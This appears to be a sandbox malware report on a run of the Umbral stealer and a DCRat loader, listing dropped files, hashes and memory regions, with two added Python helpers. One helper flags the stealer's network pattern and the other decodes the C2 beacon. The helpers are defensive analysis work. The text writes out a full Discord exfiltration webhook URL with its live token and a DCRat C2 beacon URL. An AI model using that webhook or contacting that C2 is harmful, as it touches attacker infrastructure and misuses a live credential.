          26.35.223.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          26.35.223.20.in-addr.arpa

        • 8.8.8.8:53
          30.73.42.20.in-addr.arpa
          dns
          70 B
          156 B
          1
          1

          DNS Request

          30.73.42.20.in-addr.arpa
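The Umbral.exe records above form a recognisable sequence: a connectivity probe to gstatic.com/generate_204, an ip-api.com query for the `hosting` field alone (the field that marks datacenter and VPS egress addresses, which stealers use as a sandbox check), an ip-api.com geolocation lookup with the numeric mask `fields=225545`, then two POSTs to a single Discord webhook, a 941-byte JSON message answered with 204 and a 328,880-byte multipart upload answered with 200, both sent with a fixed Opera 12 / Windows NT 6.1 user agent from a Windows 10 sandbox. The following is an added example of my own, not tria.ge tooling and not Umbral's code: it scores sandbox HTTP records for that combination of indicators and expands the numeric ip-api `fields` mask into field names. The `SAMPLE` records are constructed from the values shown in this report (the user agents of the GET requests are not shown, so they are left empty), and the `IP_API_FIELDS` bit values reproduce ip-api.com's documented numeric `fields` parameter, assumed unchanged.

```python
"""Score sandbox HTTP records for the Umbral stealer pattern recorded in this report.

Added example; not tria.ge tooling and not Umbral's code. SAMPLE is constructed
from the fields shown in the report, and IP_API_FIELDS reproduces the bit values
of ip-api.com's documented numeric "fields" parameter (assumed unchanged).
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

IP_API_FIELDS = {
    "country": 1, "countryCode": 2, "region": 4, "regionName": 8, "city": 16,
    "zip": 32, "lat": 64, "lon": 128, "timezone": 256, "isp": 512, "org": 1024,
    "as": 2048, "reverse": 4096, "query": 8192, "status": 16384, "message": 32768,
    "mobile": 65536, "proxy": 131072, "hosting": 262144, "district": 524288,
    "continent": 1048576, "continentCode": 2097152, "asname": 4194304,
    "currency": 8388608, "offset": 33554432,
}

# Discord webhook URL: the numeric id is the takedown handle, the token a live credential.
WEBHOOK_RE = re.compile(
    r"^https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)")


@dataclass(frozen=True)
class HttpRecord:
    process: str
    method: str
    url: str
    user_agent: str = ""
    content_type: str = ""
    content_length: int = 0
    status: int = 0


UMBRAL_UA = "Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17"
WEBHOOK = ("https://discord.com/api/webhooks/1221847080373584144/"
           "7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ")

# Constructed from the report's records; user agents of the GETs are not shown there.
SAMPLE = [
    HttpRecord("Umbral.exe", "GET", "https://gstatic.com/generate_204", status=204),
    HttpRecord("Umbral.exe", "GET", "http://ip-api.com/line/?fields=hosting", status=200),
    HttpRecord("Umbral.exe", "GET", "http://ip-api.com/json/?fields=225545", status=200),
    HttpRecord("Umbral.exe", "POST", WEBHOOK, UMBRAL_UA,
               "application/json; charset=utf-8", 941, 204),
    HttpRecord("Umbral.exe", "POST", WEBHOOK, UMBRAL_UA,
               'multipart/form-data; boundary="e0e3ec5c-5276-4798-b82a-f627bee59bf8"', 328880, 200),
    # Unrelated beacon from the same run; query string shortened for the sample.
    HttpRecord("StartMenuExperienceHost.exe", "GET",
               "http://a0948305.xsph.ru/_Defaultwindows.php?k=v",
               "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0",
               "application/json", 0, 403),
]


def ip_api_fields(url: str) -> set:
    """Expand ip-api.com's ?fields= value (numeric bitmask or comma list) to field names."""
    raw = parse_qs(urlparse(url).query).get("fields", [""])[0]
    if raw.isdigit():
        mask = int(raw)
        return {name for name, bit in IP_API_FIELDS.items() if mask & bit}
    return {f for f in raw.split(",") if f}


def webhook_id(url: str):
    """Return the Discord webhook id embedded in url, or None."""
    m = WEBHOOK_RE.match(url)
    return m.group(1) if m else None


def triage(records) -> dict:
    """Collect per-process indicators; return the processes showing at least two of them."""
    per_proc = {}
    for r in records:
        u = urlparse(r.url)
        ind = per_proc.setdefault(r.process, {
            "connectivity_check": False, "hosting_check": False, "geo_fields": set(),
            "webhook_ids": set(), "webhook_upload_bytes": 0, "user_agents": set()})
        if u.hostname == "gstatic.com" and u.path == "/generate_204":
            ind["connectivity_check"] = True
        elif u.hostname == "ip-api.com":
            fields = ip_api_fields(r.url)
            ind["hosting_check"] = ind["hosting_check"] or "hosting" in fields
            ind["geo_fields"] |= fields - {"hosting"}
        wid = webhook_id(r.url)
        if wid and r.method == "POST":
            ind["webhook_ids"].add(wid)
            ind["user_agents"].add(r.user_agent)
            if r.content_type.lower().startswith("multipart/form-data"):
                ind["webhook_upload_bytes"] += r.content_length
    return {
        proc: ind for proc, ind in per_proc.items()
        if sum((ind["hosting_check"], bool(ind["geo_fields"]),
                bool(ind["webhook_ids"]), ind["webhook_upload_bytes"] > 0)) >= 2
    }


if __name__ == "__main__":
    for proc, ind in triage(SAMPLE).items():
        print(proc, ind)
```

Run against the report's values, only Umbral.exe is flagged: hosting check present, the geolocation mask expands to status, country, regionName, timezone, reverse, query, mobile and proxy, one webhook id, and 328,880 bytes of multipart upload. The webhook id alone is what to quote when reporting the webhook to Discord; the token that follows it in the URL is a live credential for that webhook, so treat captured webhook URLs as secrets rather than pasting them into tickets.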
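The two GETs from StartMenuExperienceHost.exe to a0948305.xsph.ru/_Defaultwindows.php, both refused with 403 so no tasking was observed, carry random-looking parameter names and base64-shaped values, the form of a DCRat check-in. Publicly analysed DCRat builds transmit base64 text with the character order reversed; that this build does the same is an assumption here. The following added example (mine, not DCRat's or tria.ge's code) takes the beacon URL exactly as recorded above, reverses and decodes each parameter value, and keeps only results that are printable ASCII. Under that assumption the third parameter decodes to a 40-character hex string, the shape of a SHA-1 digest; what it identifies is not established by this report, and the other values do not decode to text.

```python
"""Decode the query-string values of the DCRat beacon captured in this report.

Added example, not DCRat's or tria.ge's code. Assumption: this build, like the
publicly analysed DCRat variants, sends base64 text with its character order
reversed; nothing about the meaning of the parameters is assumed.
"""
import base64
import binascii
import string
from urllib.parse import parse_qsl, urlsplit

# Beacon URL exactly as recorded in the report.
BEACON = ("http://a0948305.xsph.ru/_Defaultwindows.php?"
          "YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF"
          "&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f"
          "&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM"
          "&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF")

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def reversed_b64(value: str):
    """Reverse, re-pad and base64-decode value; None unless the result is printable ASCII."""
    s = value[::-1]
    if len(s) % 4 == 1:  # no amount of padding makes this a valid base64 length
        return None
    s += "=" * (-len(s) % 4)
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def decode_beacon(url: str) -> dict:
    """Map each query parameter name to its reversed-base64 plaintext, or None."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {key: reversed_b64(value) for key, value in pairs}


def looks_like_hex_digest(text, length: int = 40) -> bool:
    """True for a lowercase/uppercase hex string of the given length (40 = SHA-1 size)."""
    return (text is not None and len(text) == length
            and all(c in string.hexdigits for c in text))


if __name__ == "__main__":
    for key, plain in decode_beacon(BEACON).items():
        tag = " (hex digest?)" if looks_like_hex_digest(plain) else ""
        print(f"{key} -> {plain!r}{tag}")
```

Parameter names like `353b74c2c11b51923e96f36d4364b56c` and the repeated `YyNDR3...` key change between DCRat builds, so the stable thing to detect is the shape: a `.php` path with several long random keys whose values are not valid base64 until reversed. A 403 from the C2 is also worth noting in the report: the server was up (openresty) but rejected the request, so the beacon may require a header or path the sandbox run did not reproduce.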

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          985b3105d8889886d6fd953575c54e08

          SHA1

          0f9a041240a344d82bac0a180520e7982c15f3cd

          SHA256

          5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

          SHA512

          0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          6d42b6da621e8df5674e26b799c8e2aa

          SHA1

          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

          SHA256

          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

          SHA512

          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          d8cb3e9459807e35f02130fad3f9860d

          SHA1

          5af7f32cb8a30e850892b15e9164030a041f4bd6

          SHA256

          2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

          SHA512

          045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          0256bd284691ed0fc502ef3c8a7e58dc

          SHA1

          dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

          SHA256

          e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

          SHA512

          c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          ba169f4dcbbf147fe78ef0061a95e83b

          SHA1

          92a571a6eef49fff666e0f62a3545bcd1cdcda67

          SHA256

          5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

          SHA512

          8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          52afa702b34ab802e2ecd71d9539c829

          SHA1

          6a6f18158c82910e158d7e27972486c6e4dc5c93

          SHA256

          992fefff5236c174b6dd74b76a2c5c0d33470bec786ee4b30f5577aea27b8025

          SHA512

          5e42fead63b34fb62e4173e83e11110543583aece41f736c007d8512e8f23b6713140c9233bf99f9b9d1c3302a2f526bd4d33ed1ce1f777c9e0d9dea25e37639

        • C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat

          Filesize

          207B

          MD5

          e78f932d0eff4899edfc22da5cc43704

          SHA1

          4915fa24356875484286faa7e551dda9cf9307a2

          SHA256

          476251c5b0021bb2ecbe2f051dc83d31f48df444f1067cf093742e69dadf504f

          SHA512

          4b7b2efc604267663b34784b189bd1e91d9453d7c1fa1a4bc721357fad332bed46573ce854c55dd25fff018187195c79ac1886d895abb9d44ce2a78ed5d8ffe4

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eveoqp2p.ozg.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\LoaderMas.exe

          Filesize

          63KB

          MD5

          a0dbdf3af38ead2237ccb781a098a431

          SHA1

          1434296af6c5530eb036718e860490e0adc3321a

          SHA256

          6f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901

          SHA512

          dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3

        • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe

          Filesize

          18.2MB

          MD5

          ed965403e795c3b563d67c734472ad93

          SHA1

          6b8b929239d5ef8f1f546c591c67acaf560de4dc

          SHA256

          6b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d

          SHA512

          bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649

        • C:\Users\Admin\AppData\Roaming\Nursultan.exe

          Filesize

          17.9MB

          MD5

          e504e3fc36fe4d6f182c98923979a779

          SHA1

          3ba9f1a9a15b79639a20cfcf79c9de31d15a17a6

          SHA256

          70b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0

          SHA512

          63bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647

        • C:\Users\Admin\AppData\Roaming\Umbral.exe

          Filesize

          229KB

          MD5

          f48ef033300ec9fd3c77afff5c20e95f

          SHA1

          22d6125b980474b3f54937003a765cdd5352f9a8

          SHA256

          72ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e

          SHA512

          847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc

        • C:\Users\Admin\AppData\Roaming\t.bat

          Filesize

          1.1MB

          MD5

          d85bd59cf0808fb894f60773e1594a0a

          SHA1

          84b9d205f3ae6ca4f8f1bb938ee8b4d452444cde

          SHA256

          f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746

          SHA512

          225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97

        • C:\perfdhcpSvc\Chainprovider.exe

          Filesize

          827KB

          MD5

          d2ec227ddac047e735393e58e742fd44

          SHA1

          7aae5c76378f7cfcff8bb983695fa4c2577a20e2

          SHA256

          0e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce

          SHA512

          5a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979

        • C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe

          Filesize

          200B

          MD5

          00b53f3e200522631227cac1a07e0646

          SHA1

          a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe

          SHA256

          486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c

          SHA512

          22241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243

        • C:\perfdhcpSvc\mStUjP0ksX5N.bat

          Filesize

          34B

          MD5

          a9330c6da12d90d5d956ae2bbcf017d7

          SHA1

          7ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410

          SHA256

          b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393

          SHA512

          557c91cc1cc0d7309f50e286644a2da543c0283d4a1659f7d31554282ddc48b5f972d98d5a01433078fdbe6cc813bb6f7c120e2307fae48c5d81be44ae823228

        • memory/1288-0-0x00007FFF66DE3000-0x00007FFF66DE5000-memory.dmp

          Filesize

          8KB

        • memory/1288-1-0x0000000000E70000-0x0000000002240000-memory.dmp

          Filesize

          19.8MB

        • memory/1816-61-0x00000000001F0000-0x0000000000206000-memory.dmp

          Filesize

          88KB

        • memory/2460-30-0x00000000000F0000-0x000000000132A000-memory.dmp

          Filesize

          18.2MB

        • memory/2460-62-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

          Filesize

          10.8MB

        • memory/2460-31-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

          Filesize

          10.8MB

        • memory/3212-73-0x0000028F12F00000-0x0000028F12F22000-memory.dmp

          Filesize

          136KB

        • memory/3768-27-0x0000027D57A80000-0x0000027D57AC0000-memory.dmp

          Filesize

          256KB

        • memory/3768-96-0x0000027D59810000-0x0000027D5982E000-memory.dmp

          Filesize

          120KB

        • memory/3768-91-0x0000027D72270000-0x0000027D722E6000-memory.dmp

          Filesize

          472KB

        • memory/3768-190-0x0000027D59850000-0x0000027D5985A000-memory.dmp

          Filesize

          40KB

        • memory/3768-191-0x0000027D71FA0000-0x0000027D71FB2000-memory.dmp

          Filesize

          72KB

        • memory/3768-92-0x0000027D71F50000-0x0000027D71FA0000-memory.dmp

          Filesize

          320KB

        • memory/3768-33-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

          Filesize

          10.8MB

        • memory/3768-235-0x00007FFF66DE0000-0x00007FFF678A1000-memory.dmp

          Filesize

          10.8MB

        • memory/4404-97-0x0000000000CE0000-0x0000000000DB6000-memory.dmp

          Filesize

          856KB

        • memory/5016-115-0x0000000140000000-0x0000000142153000-memory.dmp

          Filesize

          33.3MB

        • memory/5016-112-0x00007FFF85290000-0x00007FFF85292000-memory.dmp

          Filesize

          8KB
